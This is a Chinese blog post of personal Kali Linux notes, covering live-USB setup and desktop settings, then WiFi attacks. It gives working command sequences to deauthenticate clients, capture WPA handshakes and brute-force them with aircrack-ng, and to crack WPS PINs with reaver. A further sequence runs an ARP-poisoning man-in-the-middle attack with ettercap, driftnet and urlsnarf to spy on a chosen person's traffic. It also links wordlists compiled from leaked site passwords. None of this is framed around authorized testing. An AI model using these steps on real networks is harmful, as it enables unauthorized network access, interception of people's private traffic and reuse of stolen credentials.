Kali手记

kali2.0安装或使用liveCD

  1. 大白菜/老毛桃官网下载U盘启动工具并设置U盘可以启动。
  2. 去kali官网下载iso文件:
    https://www.kali.org/
  3. 在U盘任一分区的根目录下建立LMT文件夹,将iso文件放在LMT目录下;并且将iso文件解压缩之后的文件(不是解压后自动生成的那个文件夹,而是那个文件夹下的所有文件)放到U盘任一分区的根目录下。
  4. 电脑开机选择U盘启动,然后选择菜单“启动自定义iso/img文件(LMT目录下)”,然后选择“自动搜索并列出LMT目录下的所有文件”,然后选择kali的iso。
  5. 启动到kali的iso后可以选择安装kali或者第一项:live (686 pae)模式启动kali。

kali2.0设置

  1. 默认账户为root,密码为toor。
  2. 在右上角点击下箭头,展开后可以选择连接wifi。
  3. 在右上角点击下箭头,展开后在左下角后有“设置”的按钮。
  4. 设置里可以在“区域和语言”里选择中国区域,并且目前只发现通过改变区域的方式可以“注销”而不是“重启”,在liveCD模式下只能使用“注销”来实现部分配置的变更;后面提到打“注销”操作均可以使用该方法。
  5. 设置->日期和时间->时区,在图上选择地点可以设置为(上海,中国)
  6. 设置->电源,设置“空白屏幕”为15分钟。
  7. 设置->鼠标和触摸板,选中“轻触表示点击”。
  8. 设置->键盘->快捷键,可以查看和设置快捷键。
    默认的常见快捷键如下:

    #mac本上super=cmd
    ctrl+c,x,v,z 复制,剪切,粘贴,取消
    ctrl+空格 切换输入法
    super+Tab 切换应用
    super+PageUp 切换到上个工作区
    super+PageDown 切换到下个工作区
    super+shift+PageUp 将当前窗口移动到上个工作区
    super+shift+PageDown 将当前窗口移动到下个工作区
    super+H 隐藏当前窗口
    super+上 当前窗口最大化
    super+下 当前窗口正常化
    super+左 当前窗口左分屏排列
    super+右 当前窗口右分屏排列
    终端下:ctrl+shift+c,v 复制,粘贴
    
  9. 设置apt源为官方提供的国内镜像:

    leafpad /etc/apt/sources.list
    #然后在文件中清空原内容,替换为以下内容:
    deb http://mirror.hust.edu.cn/kali/ sana main non-free contrib
    deb-src http://mirror.hust.edu.cn/kali/ sana main non-free contrib
    deb http://mirror.hust.edu.cn/kali-security sana/updates main contrib non-free
    #更新源
    apt-get clean
    apt-get update
    
  10. 安装中文输入法

    #如果没有成功则可能是某个源不稳定,多尝试执行几遍
    apt-get install -y fcitx-table-wbpy ttf-wqy-microhei ttf-wqy-zenhei
    #然后使用更改区域的方法注销
    

ubuntu实现kali部分功能

ubuntukylin设置

  • ubuntukylin是ubuntu的官方中文定制版;
  • 点击右上角齿轮->系统设置,进行相关设置;
    • 亮度和锁屏->在此时间内无操作则关闭屏幕:“从不”
    • 外观->行为->选中“开启工作区”
    • 文本输入,去除不需要的输入法
    • 电源->合上盖子:“不处理”;在此时间内无操作则挂起:“不要挂起”
    • 键盘->快捷键,可以查看默认的快捷键
  • 默认快捷键(Win键即Super键)
    • Super+ctrl+上 最大化窗口
    • Super+ctrl+下 恢复窗口
    • ctrl+alt+上,下,左,右 切换到上/下/左/右的工作区
    • ctrl+alt+shift+上,下,左,右 将当前窗口切换到上/下/左/右的工作区

安装常用软件

#为root设置密码,以开启su命令
sudo passwd
#先输入sudo所需要的密码(当前登录账户的密码);然后连续2次输入为root新设置的密码
#su 然后需要输入root密码
#安装7z解压软件
sudo apt install -y p7zip-full
#安装vim
sudo apt install -y vim

实现kali功能

#支持wifi破解
sudo apt-get install -y aircrack-ng

wifi破解

字典文件

kali下有随机字典生成命令:crunch,用法参见:
http://my.oschina.net/yygh/blog/312824
但通过随机数方式生成的字典巨大,实用性不强,例如(8位指仅有8位,非1-8位;并假设每个密码紧跟一个回车来分割):
数字+小写字母的8位字典未压缩大小:36^8*9/1024/1024/1024/1024=23T
数字+大小写字母的8位字典未压缩大小:62^8*9/1024/1024/1024/1024=1787T
1G内存+1.8GHz单核CPU,破解速度约为500key/s;破解纯8位数字需要:10^8/500/60/60=55小时
4G内存+2.5GHz 4核CPU,破解速度约为1900key/s;破解纯8位数字需要:10^8/1900/60/60=14小时

故建议直接使用WPA密码字典,这里下载,47M的WPA密码合集,解压后2.8G,为了方便使用,已经整合到一个文件中:(包含常见密码,所有8位数字,生日+姓名缩写等)
http://download.csdn.net/detail/zhiyuan411/9527689

WPA密码词典20160530 更新:(本次更新增加了北京电话号码词典的整合,解压后3.4G)
http://download.csdn.net/detail/zhiyuan411/9534937

WPA密码词典20160703 更新:(本次更新去除了小于8位的密码,解压后3.3G)
http://download.csdn.net/detail/zhiyuan411/9566097

WPA密码词典补充词典:(和上面的WPA密码词典进行了去重,主要内容为整合了csdn下载频道现有的WPA密码词典资源,整合了之前各大网站包含csdn,天涯,微博,人人,开心,178,766,嘟嘟牛,多玩,7k7k等等泄漏的密码;解压后640M,分多个文件上传)
http://download.csdn.net/detail/zhiyuan411/9566434
http://download.csdn.net/detail/zhiyuan411/9566439

字典破解

# 查看网卡信息
airmon-ng

# 如果执行下一句命令不成功,可以先运行本命令
airmon-ng check kill
# 监听无线网卡
# "wlan0"为上一步中查看到的无线网卡的interface名称,以下均以wlan0代指
airmon-ng start wlan0

# 扫描wifi信号
# "wlan0mon"为上一步看到的"monitor mode enabled on <xxx>"里的<xxx>,以下均以wlan0mon代指
airodump-ng wlan0mon

# 抓取握手包
# outputFileName:抓包后保存的文件名称,会保存在HOME目录下,名称为:<outpuFileName>-01.cap
# CH:待破解的wifi的信道
# BSSID:待破解的wifi的BSSID
airodump-ng -w <outputFileName> -c <CH> --bssid <BSSID> wlan0mon --ignore-negative-one

# 掉线重连以抓取到握手包。
# !!注意:要打开新的终端执行,上一步的终端不要关闭;执行后上一步如果在右上角出现"WAP Handshake: xx:xx:xx:xx"字样,表示抓到了握手包,否则需要重新执行该步
# BSSID:待破解的wifi的BSSID(也即路由器mac地址),可以在上一步看到
# STATION:客户端的mac地址,可以在上一步看到
aireplay-ng --deaut 10 -a <BSSID> -c <STATION> wlan0mon --ignore-negative-one

# 用字典暴力破解握手包
# dictFileName:为字典文件的文件名称
# outputFileName:刚才抓取握手包时的保存文件名
aircrack-ng -w <dictFileName> ~/<outputFileName>-*.cap

通过WPS的pin码破解

现在很多都是防pin路由器或300秒pin限制的,所以实战意义不大。

# 扫描开启WPS的网络
wash -i wlan0mon –C
# 如果上步没有结果,可能是因为有些隐藏了起来,可以直接扫描wifi后,依次直接尝试破解
airodump-ng wlan0mon

# 破解pin码
# BSSID:待破解wifi的BSSID
# -a 自动检测目标AP最佳配置
# -S 使用最小的DH key(可以提高破解速度)
# -d9 -t9:加入延迟,防止路由器被pin死;-d即delay表示间隔时间,预设为1秒;-t即timeout表示等待结果的超时时间;信号越好,这2个值可以越小
# 如果结果为“Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXX)”,则表示不支持WPS或者未开启WPS
reaver -i wlan0mon -b <BSSID> -a -S -vv [–d9 –t9]
# 如果路由器密码改了,但知道pin码
# BIN:pin码(8位数字)
reaver-i mon0 -b <BSSID> -p <PIN>

其他破解方法参考

kali下十大wifi攻击工具
wep网络破解

破解路由器管理后台密码

wifi监听

wifi中间人攻击

首先,通过Advanced IP Scanner扫描当前wifi下的所有ip,根据名称信息等确定要攻击(监听)的目标。也可以通过路由器管理后台查看已经连接设备的信息,从而确定要攻击的目标。

然后,在kali下执行以下命令进行攻击。

# 进行ip转发,保证目标可以正常上网
echo 1 > /proc/sys/net/ipv4/ip_forward

# 打开新终端,查看目标的详细信息
zenmap
# 在图形化界面进行以下设置:
# “Target”框输入目标的ip
# “Profile”框默认选择“Intense Scan”,不用变
# 点击“Scan”按钮

# 打开新终端,进行中间人攻击
ettercap -G
# 在图形化界面进行以下设置:
# 点击菜单 Sniff->Unified Sniffing...;选择网卡wlan0
# 点击菜单 Hosts->scan 扫描主机
# 点击菜单 Hosts->Hosts List 查看主机列表
# 在主机列表里,选中目标的ip,点击“Add to Target 1”按钮;选中路由器的ip,点击“Add to Target 2”按钮
# 点击菜单 Mitm->Arp poisoning...;选中“Snif remote connections.”,点击“确定”
# 点击菜单 Start->Start Sniffing,开始进行嗅探

# 打开新终端,监听获取到的图片,监听到图片会展示在图形化界面中
driftnet -i wlan0

# 打开新终端,监听目标浏览过的网页url信息,监听到的url信息会以日志形式打印在终端中
urlsnarf -i wlan0

# 打开新终端,进行抓包
wireshark
# 在图形化界面可以进行执行以下功能
# 选中wlan0进行监听
# 在监听记录中使用“ip.addr=xxx.xxx.xxx.xxx”进行目标ip的过滤

猜你喜欢

转载自blog.csdn.net/zhiyuan411/article/details/51469777